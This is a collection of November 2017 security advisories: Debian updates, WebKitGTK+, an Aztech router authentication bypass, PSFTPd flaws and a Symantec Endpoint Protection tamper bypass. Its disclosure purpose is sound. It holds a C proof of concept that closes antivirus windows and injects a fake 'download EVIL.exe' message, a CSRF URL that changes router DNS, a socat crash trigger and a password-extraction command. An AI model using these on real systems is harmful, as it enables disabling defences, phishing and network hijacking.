Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331 (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: === www.symantec.com Product: === Symantec Endpoint Protection v12.1.6 (12.1 RU6 MP5) Symantec 12.1.7004.6500 Vulnerability Type: === Tamper-Protection Bypass Denial Of Service / Message Spoof CVE Reference: == CVE-2017-6331 SSG16-041 Security Issue: Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI). Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could also potentially inform a user a scan was clean. Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the amount of text a malware could inject into the UI which would result in compromising the integrity of the Symantec Endpoint Protection Control Panel user interface. References: === https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00 Exploit/POC: = 1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI. 2) Try to open the Symantec Endpoint UI and you will be denied. 3) Or inject attacker supplied messages intructing the user the file is clean etc. #include #include #define VICTIM "DevViewer.exe" //By HYP3RLINX //ISR: ApparitionSec //Symantec EP Protection - Tamper Protection Bypass Vulnerability //Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 //How: FindWindow / SendMessage Win32 API //Impact: DOS / Integrity Compromised //TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans. void main(void){ while(1){ HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection")); if(hWnd!=NULL){ //This injects arbitrary messages to SEP UI. SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***"); //This prevents a user from being able to run AV scans and renders SEP UI useless //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0); } //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0); HWND x = FindWindow(NULL, TEXT("DevViewer")); if(x!=NULL){ SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0); } HWND x2 = FindWindow(NULL, TEXT("DoScan Help")); SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x3 = FindWindow(NULL, TEXT("Sylink Drop")); SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0); HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016")); if(x!=NULL){ SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0); } sleep(1); } } Network Access: === Local Severity: = Medium Disclosure Timeline: = Vendor Notification: July 8, 2016 Vendor acknowledged: 7/14/16 Vendor advisory : November 6, 2017 November 10, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
[SECURITY] [DSA 4032-1] imagemagick security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4032-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff November 12, 2017 https://www.debian.org/security/faq - - Package: imagemagick CVE ID : CVE-2017-12983 CVE-2017-13134 CVE-2017-13758 CVE-2017-13769 CVE-2017-14224 CVE-2017-14607 CVE-2017-14682 CVE-2017-14989 CVE-2017-15277 Debian Bug : 873134 873099 878508 878507 876097 878527 876488 878562 878578 This update fixes several vulnerabilities in imagemagick: Various memory handling problems and cases of missing or incomplete input sanitising may result in denial of service, memory disclosure or the execution of arbitrary code if malformed GIF, TTF, SVG, TIFF, PCX, JPG or SFW files are processed. For the stable distribution (stretch), these problems have been fixed in version 8:6.9.7.4+dfsg-11+deb9u3. We recommend that you upgrade your imagemagick packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAloIJdEACgkQEMKTtsN8 Tja3QhAAvGjpO9o4J+xHsYWgfuPb9LacPQ4heI7IFOsUySPSWtEYe4pEOIniB4q8 yUF9z17bteAvpEBMzj96Aw20uWqQQP0FnLWnVb4IIUV5R+UXNSO2y0kmoCsMwl9P 7Sguope953mH8g0zm9QiCAe6AYcFkzreh9p8cgzHZfYtJKhhypUPc+ybCgu+gSLS sAWCarR7qI7Iu+PLzKmoFqRNceigXcudes9wjvEdg90VtPBCOnECsan9T8/1xOgh pRZ2A7Z6oVe1XahtOWn279Cng3yHykMlCr7rgUI8Xst5UeRxcJGALxapnPhL3gGi UW4IuzgRME0lEU7025O4+ar/f3IRTIoiBB/rmObI5rFZl6djr4MnGL28fnVxrX44 s9th69LS3Xy73XVDkIS9hSfsHU12puk0GDlktwlps13lcIxqVlW/PoWJ95+abDdG Ok3M/zRZ3HRniGJ0vWOPgXLVwon5BljOZiM8ILwTyHxijrL5GB0s6cE0TsDzIW1O wgkbxbfHSG9DXKJUNmuE+U9AoUxBhgrxJ/5YXtdkxwuc0KpkPoy+dbg6KQkgGgjZ wxlGIXRDEv1NNrIMmz9IX25lOxW+lAlYfWu30Oepa507QXPpr99lR2LaYdSxzK4c J3NRgJ2NAKR4iwaDxVwUh6Neyr8zw44UYDzak284rhLKOWYORH4= =mtx5 -END PGP SIGNATURE-
[SECURITY] [DSA 4031-1] ruby2.3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4031-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso November 11, 2017 https://www.debian.org/security/faq - - Package: ruby2.3 CVE ID : CVE-2017-0898 CVE-2017-0903 CVE-2017-10784 CVE-2017-14033 Debian Bug : 875928 875931 875936 879231 Several vulnerabilities have been discovered in the interpreter for the Ruby language. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2017-0898 aerodudrizzt reported a buffer underrun vulnerability in the sprintf method of the Kernel module resulting in heap memory corruption or information disclosure from the heap. CVE-2017-0903 Max Justicz reported that RubyGems is prone to an unsafe object deserialization vulnerability. When parsed by an application which processes gems, a specially crafted YAML formatted gem specification can lead to remote code execution. CVE-2017-10784 Yusuke Endoh discovered an escape sequence injection vulnerability in the Basic authentication of WEBrick. An attacker can take advantage of this flaw to inject malicious escape sequences to the WEBrick log and potentially execute control characters on the victim's terminal emulator when reading logs. CVE-2017-14033 asac reported a buffer underrun vulnerability in the OpenSSL extension. A remote attacker can take advantage of this flaw to cause the Ruby interpreter to crash leading to a denial of service. For the stable distribution (stretch), these problems have been fixed in version 2.3.3-1+deb9u2. We recommend that you upgrade your ruby2.3 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAloHDDxfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QeVxAAmgX73N/qK9JzF4UGZS0P5ZjGs55ZvxrKjlhhnj5FqmHU2mkVo3se+yEO evdVAxaPD8t82fhZKcysav1yixCvoKSfridq5ZDDbsFahFi5UZC1cmHF5rkGdWru rG+jrxbFFZz0r32oSeMJVPu4dSHFyG7ToDloTzME/iubJZN3kyR6cKSm6MbKD6X2 yNlNoMKK/riTF1n9ZnLJ7GSY9vi4vyn0OZa4IyuRdIxsY9BEdBIJrWPNgBuOqwwf jtxn+BROE2b3EZi9t6zEXRiuLauDe5FRCXgNeNWpsAMbPakkRmIU5Ru3cncuPYIh puEGq4pQds/EX+/dGlw5IAY7EFDXVz4gA+8TrajUR2nwkAqXTeWkJ52JALb23MTX r7UU4LBMJRyq4pX3tH2xrncta4Hohty/vj9T+g9G+KCzLGN0HKHWDjl01SJRNahX /7CDCx0WAtxruwPu/2wM2S85giwM00RnD2LDcmjs/W18zbnGj0e9oxbboVQHC8VW UqqdbDNaiVAqma3j/vHPuGdgpNXGeOo0DkvWwKunl21EhJxis8czbppgycpRi5vP sKoNazt3alumZHWYO2FmOcZJs/BAq6+dfVUfON34S20i8KOA6Zu1DYmQZelTJg1E THqiQoPnU5obhJOviI7Dwrpiuy9irNYg2EP33pJQLszJKcqTLXo= =86GG -END PGP SIGNATURE-
Bypassable authentication in SingTel / Aztech DSL8900GR(AC) router
Credit: Cort Date: 5 Aug 2017 CVE: Not assigned Vendor: Aztech (https://www.aztech.com) / SingTel (https://www.singtel.com/) Product: Aztech DSL8900GR(AC) router Versions Affected: firmware 340.6.1-007 (latest available as of 9 Nov 2017) CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Fix: Not available. Introduction === The Aztech DSL8900GR(AC) router is distributed by SingTel (largest ISP in Singapore) with their business broadband package. It does not appear to be available for direct sales. The web admin interface for the router is protected by http basic access authentication, but it was found that this only applies to the main menu page. By directly visiting the pages used for the actual configurations (eg. DNS server settings page), no passwords are requested, and configuration changes can be successfully applied without authentication. While only the DSL8900GR(AC) was tested, other models of Aztech routers distributed by SingTel were observed to have an identical web admin interface and are potentially affected in the same way. Technical Description === The attack can be carried out by a local user without admin priviledges by directly visiting the configuration pages for the web admin interface. For example, visiting http://192.168.1.254/rtroutecfg.cmd?action=viewcfg will allow the user to view and change static routes on the router without requiring any authentication. The attack can also be remotely triggered without local access, by getting a local user to visit a malicious webpage or click on a link. The router accepts configurations change command via HTTP GET without authentication. The vulnerability can be exploited to change DNS servers, static routes, wifi passwords, and reboot the router. This can be used to spoof websites, capture traffic, or shutdown networks. All configuration changes accessible through the web admin interface are likely to be affected, but only the previously mentioned changes were tested. Proof of Concept (Local Attack) === 1) Connect to the router's network (eg. via wifi AP). 2) Visit http://192.168.1.254/rtroutecfg.cmd?action=viewcfg using any browser. No username or password is requested. 3) Change route using the web interface. It can be easily verified that the route change has been effected by the router. Proof of Concept (Remote Attack) === 1) Create a webpage containing the following HTML and place it anywhere on the internet. http://192.168.1.254/aztech_lancfg2.cgi?lanDnsSecondary=1.2.3.4;> 2) Get a user on the router's network to visit the webpage. The user does not require admin priviledges. 3) The secondary DNS has now been changed to "1.2.3.4". This example is generally harmless, but other more dangerous changes can be made in the same way. Solutions === No known workaround. Patch was expected to complete testing by 30 Sep 2017, but there was subsequently no communications from the vendor on the patch status. Timeline === 2017-08-05 Discovery by Cort. Initial vendor (Aztech) notification (no response). 2017-08-12 Second notification to vendor (no response). 2017-08-17 Third notification to vendor (no response). 2017-08-21 Notified SingCert, who in turn notified Aztech and SingTel. 2017-09-06 Patch testing expected to be completed by 30 Sep 2017 (according to SingCert). 2017-10-05 SingCert checking on status of patch. No response on status. 2017-11-05 Contacted SingCert to check on status of patch (no response). 2017-11-11 Public disclosure of vulnerability due to lack of response from vendor.
[SECURITY] [DSA 4006-2] mupdf security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - Debian Security Advisory DSA-4006-2 secur...@debian.org https://www.debian.org/security/ November 10, 2017 https://www.debian.org/security/faq - - Package: mupdf CVE ID : CVE-2017-15587 Debian Bug : 879055 It was discovered that the original patch applied for CVE-2017-15587 in DSA-4006-1 was incomplete. Updated packages are now available to address this problem. For reference, the relevant part of the original advisory text follows. CVE-2017-15587 Terry Chia and Jeremy Heng discovered an integer overflow that can cause arbitrary code execution via a crafted .pdf file. For the oldstable distribution (jessie), this problem has been fixed in version 1.5-1+deb8u3. For the stable distribution (stretch), this problem have been fixed in version 1.9a+ds1-4+deb9u2. We recommend that you upgrade your mupdf packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEayzFlnvRveqeWJspbsLe9o/+N3QFAloGD7UACgkQbsLe9o/+ N3SHXw//XanAOryOk4TuF8kEFZ3/TPdryr/64h9e9h6JC5Ro0BHX5687agJ+aDwW D1gBgULOsdwZqppRpnT8bcIJmb9KUQPhfbeeQyhkDA7DzpAZRZunpg+Wlbe+saGA ifrZss3y5Ys1w1PJOTOJxwKfWdwHDVwa4Z5Tj18zNBGKLM7LI9bbQ7evcKMob3rB /SsWz0/R+GKZR5M18/0+YKIVllIH0eQI4ZCGu3FkP3oEwbdidtJP1rdc4sZWRmCk NnJw7cotwNmAKlMUCapzK4BMEqMRmT+3eHi+UcIfh2MxDG3ecGF+Ev4Ok3H12FwG 4c3QJFaOMItMbl8U+Av7T6IwIHFPYJoCHEUekiNFIy0U7pLimE53dpZvcLM2Is9d lqDN203nqio1znTPemafqFDCD6E+m8DDegkvAkZ/XDPuTikr4Zlp9NXsq3R54V5l K3LjPhR7HEtu5YbhSHdnZ5Tj1WU765PTXhmu/off4GuKJV/1fRAsZ54fkPtlew0f 0Qj3pabBFNcElB2b81xjVEMHP8WdYyEoUASRUnGdbsZxEmx39ZI0j2Zu6kHJIhTO hwhSUUmx98qBE6pq+97mXoiD4cBOqE309ycDaRWxWq16bBh7u04bv002ROZLqIrg WY0zre1W4BQuSj7GzO1BMzNBdyuoXu0GgQ5yslgy8TkIb/BbHuU= =gE7H -END PGP SIGNATURE-
Advisory X41-2017-006: Multiple Vulnerabilities in PSFTPd Windows FTP Server
X41 D-Sec GmbH Security Advisory: X41-2017-006 Multiple Vulnerabilities in PSFTPd Windows FTP Server = Overview Confirmed Affected Versions: 10.0.4 Build 729 Confirmed Patched Versions: None Vendor: Sergei Pleis Softwareentwicklung Vendor URL: http://www.psftp.de/ftp-server/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/ Summary and Impact -- Several issues have been identified, which allow attackers to hide information in log files, recover passwords and crash the whole server. It uses neither ASLR nor DEP to make exploitation harder. Product Description --- From the vendor page, roughly translated: PSFTPd is a userfriendly, functional and robust FTP server software with support for FTP, FTPS and SFTP. Use after free == Severity Rating: High Vector: Network CVE: CVE-2017-15271 CWE: 416 CVSS Score: 7.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Summary and Impact -- An invalid memory access issue could be triggered remotely in the SFTP component of PSFTPd. This issue could be triggered prior authentication. The PSFTPd server did not automatically restart, which enabled attackers to perform a very effective DoS attack against this service. By sending the following SSH identification / version string to the server, a NULL pointer dereference could be triggered: $ cat tmp.14 SSH-2.0- $ cat tmp.14 | socat - TCP:192.168.122.50:22 The issue appears to be a race condition in the window message handling, performing the cleanup for invalid connections. Upon further investigation X41 D-Sec GmbH could confirm that the accessed memory was already freed. X41 D-Sec GmbH enabled the memory debugging functionality page heap for the psftpd_svc.exe exeutable using the command “gflags.exe /p /disable psftpd_svc.exe /full”. When observing the crash in the WinDBG 19 debugging tool, it could be confirmed that access to an already freed page was taking place. Log Injection = Severity Rating: Medium Vector: Network CVE: CVE-2017-15270 CWE: 117 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Summary and Impact -- The PSFTPd server does not properly escape data before writing it into a Comma Separated Values (CSV) file. This can be used by attackers to hide data in the Graphical User Interface (GUI) view and create arbitrary entries to a certain extent. Special characters as '"', ',' and '\r' are not escaped and can be used to add new entries to the log. Workarounds --- None Passwords stored in Plain Text == Severity Rating: Low Vector: Local CVE: CVE-2017-15272 CWE: 312 CVSS Score: 3.3 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N Summary and Impact -- The PSFTPd server stores its configuration inside the PSFTPd.dat. This file is a Microsoft Access Database and can be extracted by using the command "mdb-export PSFTPd.dat USERS" from mdbtools (https://github.com/brianb/mdbtools). The application sets the encrypt flag with the password "ITsILLEGAL", but this is not required to extract the data. The users password is shown in clear text, since it is not stored securely. Workarounds --- Use the Active Directory connector for your users. FTP Bounce Scan === Severity Rating: Medium Vector: Network CVE: CVE-2017-15269 CWE: 441 CVSS Score: 5.0 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N Summary and Impact -- The PSFTPd server does not prevent FTP bounce scans by default. These can be performed using "nmap -b" and allow to perform scans via the FTP server. Workarounds --- It is possible to prevent FTP bounce scans by setting: Kontrollmanager > Domain > Sicherheit > Register "FTP Bounce and FXP" Workarounds --- None About X41 D-Sec GmbH X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline 2017-08-31 Issues found 2017-09-18 Vendor contacted 2017-09-19 Vendor reply 2017-10-11 CVE IDs requested 2017-10-11 CVE IDs assigned 2017-11-06 Vendor informed us, that apparently a fixed version was released. We cannot confirm, since we do not have access. 2017-11-07 Public release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 Geschäftsführer: Markus Vervier signature.asc Description: OpenPGP digital signature
WebKitGTK+ Security Advisory WSA-2017-0009
WebKitGTK+ Security Advisory WSA-2017-0009 Date reported : November 10, 2017 Advisory ID: WSA-2017-0009 Advisory URL : https://webkitgtk.org/security/WSA-2017-0009.html CVE identifiers: CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803. Several vulnerabilities were discovered in WebKitGTK+. CVE-2017-13783 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13784 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13785 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13788 Versions affected: WebKitGTK+ before 2.18.3. Credit to xisigr of Tencent's Xuanwu Lab (tencent.com). Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13791 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13792 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13793 Versions affected: WebKitGTK+ before 2.18.1. Credit to Hanul Choi working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13794 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13795 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13796 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13798 Versions affected: WebKitGTK+ before 2.18.3. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13802 Versions affected: WebKitGTK+ before 2.18.1. Credit to Ivan Fratric of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13803 Versions affected: WebKitGTK+ before 2.18.3. Credit to chenqin (陈钦) of Ant-financial Light-Year Security. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information